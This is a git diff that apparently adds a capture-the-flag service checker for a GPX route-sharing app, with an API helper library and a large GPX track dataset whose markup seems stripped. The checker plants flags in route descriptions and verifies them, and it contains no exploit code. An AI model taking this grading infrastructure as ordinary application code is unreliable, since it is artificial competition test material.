diff --git a/check.py b/check.py
index 0347594..de414a1 100755
--- a/check.py
+++ b/check.py
@@ -67,6 +67,7 @@
ALLOWED_CHECKER_PATTERNS = [
"import requests",
+ "requests/",
"requests.exceptions",
"s: requests.Session",
"sess: requests.Session",
diff --git a/checkers/explorers/checker.py b/checkers/explorers/checker.py
new file mode 100755
index 0000000..b5a36fd
--- /dev/null
+++ b/checkers/explorers/checker.py
@@ -0,0 +1,199 @@
+#!/usr/bin/env python3
+import random
+import re
+import string
+import sys
+
+import requests
+from checklib import *
+from checklib import status
+
+import explorers_lib
+import gpxhelper
+
+
+class Checker(BaseChecker):
+ vulns: int = 1
+ timeout: int = 15
+ uses_attack_data: bool = True
+
+ req_ua_agents = ['python-requests/2.{}.0'.format(x) for x in range(15, 28)]
+
+ def __init__(self, *args, **kwargs):
+ super(Checker, self).__init__(*args, **kwargs)
+ self.gpx_helper = gpxhelper.TrackHelper()
+ self.lib = explorers_lib.ExplorersLib(self)
+ self.id_regexp = re.compile(r'^[0-9A-Za-z]{1,40}$')
+
+ def session_with_req_ua(self):
+ sess = get_initialized_session()
+ if random.randint(0, 1) == 1:
+ sess.headers['User-Agent'] = random.choice(self.req_ua_agents)
+ return sess
+
+ def random_route_name(self):
+ return 'Expedition #{}'.format(random.randint(1, 10000))
+
+ def random_description(self, name: str):
+ choices = ['how was it', 'report', 'detailed report', 'what we found', 'confidential']
+ if random.randint(0, 1) == 1:
+ return name + ':' + rnd_string(20)
+ return '{}: {}'.format(name, random.choice(choices))
+
+ def validate_rid(self, mid):
+ self.assert_eq(bool(self.id_regexp.fullmatch(mid)), True, 'Invalid id format')
+
+ def action(self, action, *args, **kwargs):
+ try:
+ super(Checker, self).action(action, *args, **kwargs)
+ except requests.exceptions.ConnectionError:
+ self.cquit(Status.DOWN, 'Connection error', 'Got requests connection error')
+
+ def check(self):
+ session = self.session_with_req_ua()
+ username, password = rnd_username(), rnd_password()
+
+ self.lib.signup(session, username, password)
+ self.lib.signin(session, username, password)
+
+ random_name = self.random_route_name()
+ random_description = self.random_description(random_name)
+ route = self.lib.create_route(session, random_name, random_description)
+
+ route_id = route.get('id')
+
+ self.validate_rid(route_id)
+ self.assert_eq(route.get('title'), random_name, 'Failed to create route')
+ self.assert_eq(route.get('description'), random_description, 'Failed to create route')
+
+ route_list = self.lib.get_route_list(session)
+ self.assert_eq(len(route_list), 1, 'Failed to get route list')
+ self.assert_eq(route_list[0].get('title'), random_name, 'Failed to get route list')
+ self.assert_eq(route_list[0].get('description'), random_description, 'Failed to get route list')
+
+ wpts = [
+ gpxhelper.WaypointParams(
+ name='Oil found',
+ description='Oil found at {}m'.format(random.randint(100, 1000) / 10)
+ ),
+ gpxhelper.WaypointParams(
+ name='Oil not found',
+ description='No oil was found',
+ )
+ ]
+ if random.randint(0, 1) == 1:
+ wpts.append(gpxhelper.WaypointParams(
+ name='Oil found',
+ description='Oil found at {}m'.format(random.randint(100, 1000) / 10)
+ ))
+
+ gpx_file = self.gpx_helper.random_gpx_from_ds(username, wpts)
+
+ updated_gpx = self.lib.upload_gpx(session, route_id, gpx_file)
+ got_waypoints = updated_gpx.get('waypoints', [])
+ got_tracks = updated_gpx.get('track_points', [])
+
+ self.assert_eq(set(x.name for x in wpts), set(x.get('name') for x in got_waypoints), 'Failed to upload gpx')
+ self.assert_eq(set(x.description for x in wpts), set(x.get('desc') for x in got_waypoints),
+ 'Failed to upload gpx')
+
+ got_waypoints[-1]['name'] = rnd_string(31, alphabet=string.ascii_uppercase + string.digits)
+ got_waypoints[-1]['desc'] = rnd_string(31, alphabet=string.ascii_uppercase + string.digits)
+ new_description = rnd_string(31, alphabet=string.ascii_uppercase + string.digits)
+
+ self.lib.update_route(session, route_id, new_description, got_tracks, got_waypoints)
+ updated_gpx = self.lib.get_route(session, route_id)
+
+ self.assert_eq(updated_gpx.get('description'), new_description, 'Failed to update route')
+ self.assert_eq(set(x.get('name') for x in got_waypoints), set(x.get('name') for x in updated_gpx['waypoints']),
+ 'Failed to update route')
+ self.assert_eq(set(x.get('desc') for x in got_waypoints),
+ set(x.get('desc') for x in updated_gpx['waypoints']),
+ 'Failed to update route')
+
+ u2, p2 = rnd_username(), rnd_password()
+ s2 = self.session_with_req_ua()
+ self.lib.signup(s2, u2, p2)
+
+ gpx_by_token = self.lib.get_route(s2, route_id, updated_gpx.get('share_token'))
+ self.assert_eq(gpx_by_token.get('title'), random_name, 'Failed to get route by token')
+ self.assert_eq(gpx_by_token.get('description'), new_description, 'Failed to get route by token')
+ self.assert_eq(set(x.get('name') for x in got_waypoints), set(x.get('name') for x in gpx_by_token['waypoints']),
+ 'Failed to get route by token')
+ self.assert_eq(set(x.get('desc') for x in got_waypoints),
+ set(x.get('desc') for x in gpx_by_token['waypoints']),
+ 'Failed to get route by token')
+
+ self.cquit(Status.OK)
+
+ def put(self, flag_id: str, flag: str, vuln: str):
+ sess = self.session_with_req_ua()
+ u = rnd_username()
+ p = rnd_password()
+
+ self.lib.signup(sess, u, p)
+ self.lib.signin(sess, u, p)
+
+ name = self.random_route_name()
+ description = flag
+
+ route = self.lib.create_route(sess, name, description)
+ route_id = route.get('id')
+
+ self.validate_rid(route_id)
+ self.assert_eq(route.get('title'), name, 'Failed to create route')
+ self.assert_eq(route.get('description'), description, 'Failed to create route')
+
+ wpts = [
+ gpxhelper.WaypointParams(
+ name='Oil found',
+ description='Oil found at {}m'.format(random.randint(100, 1000) / 10)
+ ),
+ ]
+
+ gpx_file = self.gpx_helper.random_gpx(creator=u, waypoints=wpts, num_points=random.randint(5, 15))
+ self.lib.upload_gpx(sess, route_id, gpx_file)
+
+ updated_gpx = self.lib.get_route(sess, route_id)
+
+ self.assert_eq(flag, updated_gpx.get('description'), 'Failed to upload gpx')
+ self.assert_eq(name, updated_gpx.get('title'), 'Failed to upload gpx')
+ self.assert_eq(set(x.name for x in wpts), set(x.get('name') for x in updated_gpx['waypoints']),
+ 'Failed to upload gpx')
+ self.assert_eq(set(x.description for x in wpts), set(x.get('desc') for x in updated_gpx['waypoints']),
+ 'Failed to upload gpx')
+
+ self.cquit(Status.OK, route_id, f"{u}:{p}:{route_id}")
+
+ def get(self, flag_id: str, flag: str, vuln: str):
+ u, p, route_id = flag_id.split(':')
+ sess = self.session_with_req_ua()
+ self.lib.signin(sess, u, p, status=Status.CORRUPT)
+
+ route = self.lib.get_route(sess, route_id, status=Status.CORRUPT)
+ self.assert_eq(route.get('description'), flag, 'Failed to get route', status=Status.CORRUPT)
+
+ route_list = self.lib.get_route_list(sess, status=Status.CORRUPT)
+ self.assert_in(flag, [x.get('description') for x in route_list], 'Failed to get route list',
+ status=Status.CORRUPT)
+
+ u, p = rnd_username(), rnd_password()
+ new_sess = self.session_with_req_ua()
+ self.lib.signup(new_sess, u, p)
+
+ new_sess = self.session_with_req_ua()
+ self.lib.signin(new_sess, u, p)
+
+ route = self.lib.get_route(new_sess, route_id, token=route.get('share_token'), status=Status.CORRUPT)
+ self.assert_eq(route.get('description'), flag, 'Failed to get route by token', status=Status.CORRUPT)
+
+ self.cquit(Status.OK)
+
+
+if __name__ == '__main__':
+ c = Checker(sys.argv[2])
+
+ try:
+ c.action(sys.argv[1], *sys.argv[3:])
+ except c.get_check_finished_exception() as e:
+ cquit(status.Status(c.status), c.public, c.private)
diff --git a/checkers/explorers/explorers_lib.py b/checkers/explorers/explorers_lib.py
new file mode 100644
index 0000000..667b4cd
--- /dev/null
+++ b/checkers/explorers/explorers_lib.py
@@ -0,0 +1,88 @@
+from typing import Optional
+
+import checklib
+from checklib import BaseChecker
+import requests
+
+PORT = 8000
+
+
+class ExplorersLib:
+ @property
+ def api_url(self):
+ return f'http://{self.host}:{self.port}/api'
+
+ def __init__(self, checker: BaseChecker, port=PORT, host=None):
+ self.c = checker
+ self.port = port
+ self.host = host or self.c.host
+
+ def signup(self, session: requests.Session, username: str, password: str):
+ resp = session.post(f'{self.api_url}/signup', json={
+ 'username': username,
+ 'password': password
+ })
+ self.c.assert_eq(resp.status_code, 200, 'Failed to signup')
+ resp_json = self.c.get_json(resp, 'Failed to signup: invalid JSON')
+ return resp_json
+
+ def signin(self, session: requests.Session, username: str, password: str,
+ status: checklib.Status = checklib.Status.MUMBLE):
+ resp = session.post(f'{self.api_url}/signin', json={
+ 'username': username,
+ 'password': password
+ })
+ self.c.assert_eq(resp.status_code, 200, 'Failed to signin', status=status)
+ resp_json = self.c.get_json(resp, 'Failed to signin: invalid JSON')
+ return resp_json
+
+ def create_route(self, session: requests.Session, title: str, description: str):
+ resp = session.post(f'{self.api_url}/route/create', json={
+ 'title': title,
+ 'description': description
+ })
+ self.c.assert_eq(resp.status_code, 200, 'Failed to create route')
+ resp_json = self.c.get_json(resp, 'Failed to create route: invalid JSON')
+ self.c.assert_eq(type(resp_json), dict, 'Failed to create route: invalid JSON')
+ return resp_json
+
+ def get_route_list(self, session: requests.Session, status: checklib.Status = checklib.Status.MUMBLE):
+ resp = session.get(f'{self.api_url}/route')
+ self.c.assert_eq(resp.status_code, 200, 'Failed to get route list', status=status)
+ resp_json = self.c.get_json(resp, 'Failed to get route list: invalid JSON')
+ self.c.assert_eq(type(resp_json), list, 'Failed to get route list: invalid JSON')
+ return resp_json
+
+ def get_route(self, session: requests.Session, route_id: str, token: Optional[str] = None,
+ status: checklib.Status = checklib.Status.MUMBLE):
+ params = {}
+ if token:
+ params['token'] = token
+ resp = session.get(f'{self.api_url}/route/{route_id}', params=params)
+ self.c.assert_eq(resp.status_code, 200, 'Failed to get route', status=status)
+ resp_json = self.c.get_json(resp, 'Failed to get route: invalid JSON')
+ self.c.assert_eq(type(resp_json), dict, 'Failed to get route: invalid JSON')
+ return resp_json
+
+ def update_route(self, session: requests.Session, route_id: str, description: str, points=list[dict],
+ waypoints=list[dict]):
+ pld = {
+ 'description': description,
+ 'track_points': points,
+ 'waypoints': waypoints
+ }
+ resp = session.post(f'{self.api_url}/route/{route_id}/update', json=pld)
+
+ self.c.assert_eq(resp.status_code, 200, 'Failed to update route')
+ resp_json = self.c.get_json(resp, 'Failed to update route: invalid JSON')
+ self.c.assert_eq(type(resp_json), dict, 'Failed to update route: invalid JSON')
+ return resp_json
+
+ def upload_gpx(self, session: requests.Session, route_id: str, file):
+ resp = session.post(f'{self.api_url}/route/{route_id}/upload', files={
+ 'file': file
+ })
+ self.c.assert_eq(resp.status_code, 200, 'Failed to upload gpx')
+ resp_json = self.c.get_json(resp, 'Failed to upload gpx: invalid JSON')
+ self.c.assert_eq(type(resp_json), dict, 'Failed to upload gpx: invalid JSON')
+ return resp_json
diff --git a/checkers/explorers/gpx_ds_small.csv b/checkers/explorers/gpx_ds_small.csv
new file mode 100644
index 0000000..33c9c57
--- /dev/null
+++ b/checkers/explorers/gpx_ds_small.csv
@@ -0,0 +1,98021 @@
+gpx
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+2014-10-30 08:50
+
+
+
+
+
+OruxMaps
+2014-10-30T07:50:07Z
+
+
+2014-10-30 08:50
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2014-10-30 08:50</h2><br /><p>Orario inizio: 10/30/2014 08:51</p><p>Orario fine: 10/30/2014 13:25</p><p>Distanza: 5,2 km (04:34)</p><p>Tempo movimento: 02:58</p><p>Media segmento attuale: 1,1 km/h</p><p>Media veloc. mov.: 1,7 km/h</p><p>Max. Velocità: 24 km/h</p><p>Altitudine minima: 1290 m</p><p>Altitudine massima: 2406 m</p><p>Velocità di salita: 406,3 m/h</p><p>Velocità di discesa: -582,7 m/h</p><p>Guadagno di elevazione: 1240 m</p><p>Perdita di elevazione: -155 m</p><p>Tempo di salita: 03:03</p><p>Tempo di discesa: 00:16</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Non definito
+
+
+
+
+
+1303.61
+2014-10-30T07:51:04Z
+
+
+1295.42
+2014-10-30T07:54:19Z
+
+
+1291.21
+2014-10-30T07:55:48Z
+
+
+1313.38
+2014-10-30T08:00:43Z
+
+
+1364.84
+2014-10-30T08:04:10Z
+
+
+1372.75
+2014-10-30T08:05:08Z
+
+
+1557.32
+2014-10-30T08:07:16Z
+
+
+1582.28
+2014-10-30T08:07:34Z
+
+
+1454.28
+2014-10-30T08:09:59Z
+
+
+1417.27
+2014-10-30T08:10:46Z
+
+
+1385.31
+2014-10-30T08:11:30Z
+
+
+1392.0
+2014-10-30T08:12:05Z
+
+
+1412.06
+2014-10-30T08:14:17Z
+
+
+1415.4
+2014-10-30T08:14:45Z
+
+
+1441.75
+2014-10-30T08:20:11Z
+
+
+1446.55
+2014-10-30T08:20:49Z
+
+
+1442.95
+2014-10-30T08:21:05Z
+
+
+1448.12
+2014-10-30T08:21:32Z
+
+
+1452.9
+2014-10-30T08:23:05Z
+
+
+1469.98
+2014-10-30T08:24:31Z
+
+
+1480.13
+2014-10-30T08:26:27Z
+
+
+1488.04
+2014-10-30T08:26:54Z
+
+
+1523.06
+2014-10-30T08:27:54Z
+
+
+1545.88
+2014-10-30T08:30:11Z
+
+
+1542.45
+2014-10-30T08:31:56Z
+
+
+1544.81
+2014-10-30T08:32:30Z
+
+
+1567.65
+2014-10-30T08:35:53Z
+
+
+1612.92
+2014-10-30T08:39:31Z
+
+
+1613.1
+2014-10-30T08:40:47Z
+
+
+1619.66
+2014-10-30T08:41:43Z
+
+
+1637.62
+2014-10-30T08:44:15Z
+
+
+1664.87
+2014-10-30T08:48:34Z
+
+
+1705.98
+2014-10-30T08:52:48Z
+
+
+1718.73
+2014-10-30T08:56:53Z
+
+
+1737.93
+2014-10-30T08:59:57Z
+
+
+1776.63
+2014-10-30T09:05:01Z
+
+
+1818.19
+2014-10-30T09:09:32Z
+
+
+1806.82
+2014-10-30T09:10:53Z
+
+
+1840.93
+2014-10-30T09:14:01Z
+
+
+1847.86
+2014-10-30T09:15:18Z
+
+
+1832.1
+2014-10-30T09:20:47Z
+
+
+1835.42
+2014-10-30T09:22:01Z
+
+
+1843.77
+2014-10-30T09:24:12Z
+
+
+1868.22
+2014-10-30T09:28:04Z
+
+
+1884.87
+2014-10-30T09:30:15Z
+
+
+1908.26
+2014-10-30T09:32:37Z
+
+
+1932.32
+2014-10-30T09:36:04Z
+
+
+1959.99
+2014-10-30T09:41:41Z
+
+
+1969.25
+2014-10-30T09:44:30Z
+
+
+2012.84
+2014-10-30T09:50:57Z
+
+
+2011.22
+2014-10-30T09:53:07Z
+
+
+2060.91
+2014-10-30T09:58:14Z
+
+
+2063.63
+2014-10-30T10:01:45Z
+
+
+2084.33
+2014-10-30T10:09:15Z
+
+
+2105.09
+2014-10-30T10:14:35Z
+
+
+2134.92
+2014-10-30T10:21:03Z
+
+
+2176.71
+2014-10-30T10:29:12Z
+
+
+2190.95
+2014-10-30T10:31:52Z
+
+
+2224.99
+2014-10-30T10:39:01Z
+
+
+2263.6
+2014-10-30T10:43:59Z
+
+
+2294.68
+2014-10-30T10:50:22Z
+
+
+2304.55
+2014-10-30T10:51:28Z
+
+
+2340.46
+2014-10-30T10:58:08Z
+
+
+2355.79
+2014-10-30T11:03:22Z
+
+
+2400.14
+2014-10-30T11:12:22Z
+
+
+2139.61
+2014-10-30T12:25:20Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-12-22T17:28:27Z
+
+22-DEC-16 13:28:25
+
+
+
+
+
+15.52
+2016-12-22T14:37:58Z
+
+
+
+
+28.5
+2016-12-22T14:44:57Z
+
+
+
+
+43.4
+2016-12-22T14:46:35Z
+
+
+
+
+43.4
+2016-12-22T14:47:18Z
+
+
+
+
+59.74
+2016-12-22T14:56:49Z
+
+
+
+
+92.42
+2016-12-22T15:08:21Z
+
+
+
+
+115.5
+2016-12-22T15:17:12Z
+
+
+
+
+145.78
+2016-12-22T15:22:01Z
+
+
+
+
+169.33
+2016-12-22T15:25:28Z
+
+
+
+
+183.75
+2016-12-22T15:28:52Z
+
+
+
+
+192.4
+2016-12-22T15:31:09Z
+
+
+
+
+213.55
+2016-12-22T15:37:24Z
+
+
+
+
+222.68
+2016-12-22T15:39:23Z
+
+
+
+
+229.41
+2016-12-22T15:41:27Z
+
+
+
+
+244.79
+2016-12-22T15:46:01Z
+
+
+
+
+252.48
+2016-12-22T15:48:51Z
+
+
+
+
+251.04
+2016-12-22T15:52:43Z
+
+
+
+
+253.44
+2016-12-22T15:56:05Z
+
+
+
+
+256.33
+2016-12-22T16:01:14Z
+
+
+
+
+259.21
+2016-12-22T16:03:39Z
+
+
+
+
+255.37
+2016-12-22T16:05:37Z
+
+
+
+
+252.48
+2016-12-22T16:08:03Z
+
+
+
+
+244.79
+2016-12-22T16:09:47Z
+
+
+
+
+239.51
+2016-12-22T16:12:58Z
+
+
+
+
+236.62
+2016-12-22T16:16:36Z
+
+
+
+
+236.62
+2016-12-22T16:18:21Z
+
+
+
+
+233.26
+2016-12-22T16:22:50Z
+
+
+
+
+230.37
+2016-12-22T16:24:59Z
+
+
+
+
+229.89
+2016-12-22T16:25:31Z
+
+
+
+
+227.97
+2016-12-22T16:27:12Z
+
+
+
+
+228.45
+2016-12-22T16:30:05Z
+
+
+
+
+226.53
+2016-12-22T16:32:04Z
+
+
+
+
+213.55
+2016-12-22T16:36:18Z
+
+
+
+
+161.16
+2016-12-22T16:45:58Z
+
+
+
+
+148.66
+2016-12-22T16:47:36Z
+
+
+
+
+135.68
+2016-12-22T16:51:02Z
+
+
+
+
+123.67
+2016-12-22T16:53:24Z
+
+
+
+
+103.48
+2016-12-22T16:57:18Z
+
+
+
+
+95.79
+2016-12-22T16:59:12Z
+
+
+
+
+70.79
+2016-12-22T17:07:18Z
+
+
+
+
+65.03
+2016-12-22T17:09:46Z
+
+
+
+
+44.84
+2016-12-22T17:18:30Z
+
+
+
+
+36.67
+2016-12-22T17:20:34Z
+
+
+
+
+30.42
+2016-12-22T17:21:52Z
+
+
+
+
+27.53
+2016-12-22T17:24:34Z
+
+
+
+
+28.5
+2016-12-22T17:25:56Z
+
+
+
+
+28.5
+2016-12-22T17:28:19Z
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Hornbachegg - Schaber - Oberwald
+
+
+
+
+
+
+
+
+
+777.6
+
+
+771.9999790383827
+
+
+767.7
+
+
+761.1
+
+
+760.3000082267885
+
+
+761.2000174376734
+
+
+775.1000409222651
+
+
+775.380816675588
+
+
+782.3000333038073
+
+
+784.9999528493667
+
+
+787.2728723277879
+
+
+789.9000189640379
+
+
+795.6000408807362
+
+
+809.810905249848
+
+
+809.2525384002661
+
+
+819.9000119144234
+
+
+822.8999909613445
+
+
+834.6999379232229
+
+
+837.5000198913325
+
+
+842.8000251403425
+
+
+864.7999330449643
+
+
+902.0
+
+
+910.5000194100919
+
+
+929.6999677098156
+
+
+939.89998743058
+
+
+940.8767935973865
+
+
+962.2243949053202
+
+
+965.9000629414012
+
+
+1008.4000024765363
+
+
+1020.8999799631872
+
+
+1002.1999860105111
+
+
+986.5000082169274
+
+
+990.9999744797325
+
+
+979.9
+
+
+958.9
+
+
+946.3999988536326
+
+
+943.9000055319067
+
+
+948.2503481615347
+
+
+955.9
+
+
+956.2000223563365
+
+
+960.1
+
+
+956.9000160458379
+
+
+953.0999826635642
+
+
+949.7
+
+
+930.7000189640913
+
+
+927.6999994396256
+
+
+925.0
+
+
+927.6999994396256
+
+
+925.5271754923224
+
+
+926.499997623785
+
+
+920.6000284266117
+
+
+909.8999968088965
+
+
+896.0000019888164
+
+
+885.2
+
+
+885.5999948607501
+
+
+881.1999678321605
+
+
+873.1797469845723
+
+
+865.500006443939
+
+
+847.7000246456774
+
+
+832.4000108770484
+
+
+817.2999985395498
+
+
+816.0999948157518
+
+
+810.8999904588321
+
+
+814.1999990213632
+
+
+814.5000031285637
+
+
+811.3
+
+
+806.7000164606216
+
+
+796.0000525126504
+
+
+783.800093093686
+
+
+777.2999350434964
+
+
+764.3
+
+
+753.9
+
+
+746.2
+
+
+741.1999992727384
+
+
+740.3
+
+
+740.9000286048406
+
+
+743.3
+
+
+748.6
+
+
+757.8
+
+
+771.4
+
+
+777.4
+ "
+"
+
+
+
+
+
+
+
+Yerevan Cascade
+At an altitude of 900 meter Yerevan is dominated by the mighty silhouette of Noah's mountain, Ararat. However, for generations Ararat and the former Armenian land around it has belonged to Turkey. One can sense a certain melancholy or resignation in this stony country that has suffered repeated conquests and earth quakes. Yet Yerevan has a fresh atmosphere, although the years after independence from the former Soviet Union were tumultuous. The visitor sees a young, quite egalitarian country.
+
+To fully explore the capital of Armenia, one needs several days. Thankfully, street names and locations in Yerevan are now signposted in both Armenian and Latin script. Tourism is welcome with an air of honest hospitality. Restaurants of all kind and budgets are everywhere, Jazz clubs are going through a revival.
+
+Climbing the Yerevan Cascade from the bottom to the top is a good exercise - repeat as often as needed. The upper third of the stairs leads past a huge construction pit, which is likely to remain under construction for a while. The lower part can be also overcome by escalators.
+
+At each level, there are pieces of art, both outside on the stairs and inside where the escalators are. The whole area is an open-air museum of modern art.
+
+At an altitude of 900 meter Yerevan is dominated by the mighty silhouette of Noah's mountain, Ararat. However, for generations Ararat and the former Armenian land around it has belonged to Turkey. One can sense a certain melancholy or resignation in this stony country that has suffered repeated conquests and earth quakes. Yet Yerevan has a fresh atmosphere, although the years after independence from the former Soviet Union were tumultuous. The visitor sees a young, quite egalitarian country.
+
+To fully explore the capital of Armenia, one needs several days. Thankfully, street names and locations in Yerevan are now signposted in both Armenian and Latin script. Tourism is welcome with an air of honest hospitality. Restaurants of all kind and budgets are everywhere, Jazz clubs are going through a revival.
+
+Climbing the Yerevan Cascade from the bottom to the top is a good exercise - repeat as often as needed. The upper third of the stairs leads past a huge construction pit, which is likely to remain under construction for a while. The lower part can be also overcome by escalators.
+
+At each level, there are pieces of art, both outside on the stairs and inside where the escalators are. The whole area is an open-air museum of modern art.
+
+
+
+
+945.3
+2014-10-24T14:02:54Z
+
+
+950.9
+2014-10-24T14:03:35Z
+
+
+1017.5
+2014-10-24T14:14:10Z
+
+
+1019.4
+2014-10-24T14:17:08Z
+
+
+1028.6
+2014-10-24T14:18:28Z
+
+
+1039.9
+2014-10-24T14:20:10Z
+
+
+1044.3
+2014-10-24T14:21:08Z
+
+
+1052.5
+2014-10-24T14:21:57Z
+
+
+1057.6
+2014-10-24T14:23:53Z
+
+
+1057.0
+2014-10-24T14:27:20Z
+
+
+1043.2
+2014-10-24T14:29:41Z
+
+
+1041.8
+2014-10-24T14:29:54Z
+
+
+1038.4
+2014-10-24T14:30:40Z
+
+
+1033.8
+2014-10-24T14:31:08Z
+
+
+1023.1
+2014-10-24T14:32:37Z
+
+
+1016.0
+2014-10-24T14:33:35Z
+
+
+1011.2
+2014-10-24T14:34:56Z
+
+
+941.7
+2014-10-24T14:53:15Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-10-12T11:09:56Z
+
+2015-10-12 13:09:55
+
+
+
+
+
+
+2085.77
+2015-10-12T09:17:06Z
+
+
+2102.37
+2015-10-12T09:34:25Z
+
+
+2126.75
+2015-10-12T09:52:04Z
+
+
+2141.16
+2015-10-12T10:23:59Z
+
+
+2227.93
+2015-10-12T11:04:51Z
+
+
+2244.74
+2015-10-12T11:09:47Z
+ "
+"
+
+
+Kandersteg
+
+Monika Teusch - Community
+
+
+
+2016-02-27T12:14:26Z
+
+Kandersteg
+
+
+
+1181.40479
+
+
+1176.14877
+
+
+1177.41623
+
+
+1175.92416
+
+
+1179.1567
+
+
+1172.06747
+
+
+1172.35202
+
+
+1173.22641
+
+
+1171.47494
+
+
+1174.69516
+
+
+1175.14291
+
+
+1180.08859
+
+
+1173.46408
+
+
+1176.82284
+
+
+1182.1318
+
+
+1189.20187
+
+
+1198.85409
+
+
+1205.68527
+
+
+1219.86129
+
+
+1226.6799
+
+
+1236.04245
+
+
+1250.90439
+
+
+1259.1766
+
+
+1273.83639
+
+
+1277.17282
+
+
+1287.39474
+
+
+1308.01022
+
+
+1318.19772
+
+
+1311.52499
+
+
+1304.61813
+
+
+1304.31503
+
+
+1301.64816
+
+
+1293.50424
+
+
+1289.71701
+
+
+1286.14108
+
+
+1279.72006
+
+
+1268.75839
+
+
+1268.43209
+
+
+1263.13144
+
+
+1254.69626
+
+
+1248.68637
+
+
+1225.40793
+
+
+1213.8049
+
+
+1214.22018
+
+
+1211.18966
+
+
+1210.91793
+
+
+1209.77548
+
+
+1209.0903
+
+
+1192.12704
+
+
+1174.78085
+
+
+1173.10202
+
+
+1174.69308
+
+
+1176.42196
+
+
+1174.29269
+
+
+1176.70285
+
+
+1176.82724
+
+
+1175.96798
+
+
+1181.93295
+ "
+"
+
+
+Südtirol
+
+
+
+
+
+
+OruxMaps
+2015-05-28T11:19:31Z
+
+
+Südtirol
+
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Südtirol
+</h2><br /><p>Startzeit: 05/28/2015 13:19</p><p>Zielzeit: 05/28/2015 17:27</p><p>Strecke: 4,8km (04:08)</p><p>Bewegungszeit: 02:12</p><p>Ø-Geschwindigkeit: 1,2km/h</p><p>Netto-Geschwindigkeit: 2,2km/h</p><p>Max. Geschwindigkeit: 7,9km/h</p><p>Minimale Höhe: 1472m</p><p>Maximale Höhe: 2086m</p><p>Steig-Geschw.: 354,3m/h</p><p>Sink-Geschw.: -508,6m/h</p><p>Aufstieg: 657m</p><p>Abstieg: -643m</p><p>Steigzeit: 01:51</p><p>Sinkzeit: 01:15</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1472.87
+2015-05-28T11:19:32Z
+
+
+1511.6
+2015-05-28T11:19:34Z
+
+
+1532.6
+2015-05-28T11:25:01Z
+
+
+1533.11
+2015-05-28T11:27:02Z
+
+
+1525.24
+2015-05-28T11:28:31Z
+
+
+1513.79
+2015-05-28T11:29:30Z
+
+
+1556.24
+2015-05-28T11:32:58Z
+
+
+1586.74
+2015-05-28T11:39:40Z
+
+
+1611.61
+2015-05-28T11:40:51Z
+
+
+1620.36
+2015-05-28T11:41:57Z
+
+
+1643.22
+2015-05-28T11:44:02Z
+
+
+1682.37
+2015-05-28T11:50:10Z
+
+
+1701.11
+2015-05-28T11:52:48Z
+
+
+1723.7
+2015-05-28T11:56:49Z
+
+
+1772.63
+2015-05-28T12:02:09Z
+
+
+1797.74
+2015-05-28T12:05:50Z
+
+
+1821.24
+2015-05-28T12:08:17Z
+
+
+1845.14
+2015-05-28T12:12:45Z
+
+
+1842.28
+2015-05-28T12:14:06Z
+
+
+1841.15
+2015-05-28T12:15:19Z
+
+
+1837.87
+2015-05-28T12:17:40Z
+
+
+1843.35
+2015-05-28T12:19:16Z
+
+
+1850.22
+2015-05-28T12:22:23Z
+
+
+1873.75
+2015-05-28T12:25:21Z
+
+
+1891.26
+2015-05-28T12:27:46Z
+
+
+1893.15
+2015-05-28T12:28:40Z
+
+
+1941.3
+2015-05-28T12:34:45Z
+
+
+1993.37
+2015-05-28T12:45:37Z
+
+
+1994.74
+2015-05-28T12:46:51Z
+
+
+1994.75
+2015-05-28T12:53:29Z
+
+
+2037.58
+2015-05-28T12:59:19Z
+
+
+2071.41
+2015-05-28T13:07:31Z
+
+
+2046.24
+2015-05-28T13:23:13Z
+
+
+2054.02
+2015-05-28T13:24:34Z
+
+
+2033.71
+2015-05-28T14:06:49Z
+
+
+1987.21
+2015-05-28T14:13:53Z
+
+
+1969.74
+2015-05-28T14:18:30Z
+
+
+1944.3
+2015-05-28T14:20:24Z
+
+
+1934.24
+2015-05-28T14:20:49Z
+
+
+1926.91
+2015-05-28T14:22:11Z
+
+
+1914.24
+2015-05-28T14:25:23Z
+
+
+1907.66
+2015-05-28T14:26:32Z
+
+
+1869.47
+2015-05-28T14:29:31Z
+
+
+1866.94
+2015-05-28T14:31:10Z
+
+
+1860.32
+2015-05-28T14:32:07Z
+
+
+1836.99
+2015-05-28T14:34:24Z
+
+
+1838.37
+2015-05-28T14:35:54Z
+
+
+1815.6
+2015-05-28T14:37:29Z
+
+
+1785.44
+2015-05-28T14:39:52Z
+
+
+1738.75
+2015-05-28T14:43:47Z
+
+
+1728.51
+2015-05-28T15:07:25Z
+
+
+1719.16
+2015-05-28T15:08:19Z
+
+
+1648.74
+2015-05-28T15:14:38Z
+
+
+1631.66
+2015-05-28T15:15:26Z
+
+
+1628.65
+2015-05-28T15:15:48Z
+
+
+1606.83
+2015-05-28T15:16:54Z
+
+
+1556.77
+2015-05-28T15:20:17Z
+
+
+1539.39
+2015-05-28T15:21:18Z
+
+
+1532.89
+2015-05-28T15:22:17Z
+
+
+1534.01
+2015-05-28T15:22:29Z
+
+
+1527.21
+2015-05-28T15:24:28Z
+
+
+1517.74
+2015-05-28T15:26:30Z
+
+
+1508.24
+2015-05-28T15:27:49Z
+ "
+"
+
+
+
+
+
+
+
+ES CHA
+
+
+
+2240.7
+
+
+2245.1
+
+
+2255.9
+
+
+2254.8
+
+
+2269.6
+
+
+2289.9
+
+
+2296.5
+
+
+2298.5
+
+
+2306.5
+
+
+2315.9
+
+
+2325.3
+
+
+2324.8
+
+
+2355.0
+
+
+2367.8
+
+
+2410.0
+
+
+2447.2
+
+
+2457.6
+
+
+2488.9
+
+
+2493.6
+
+
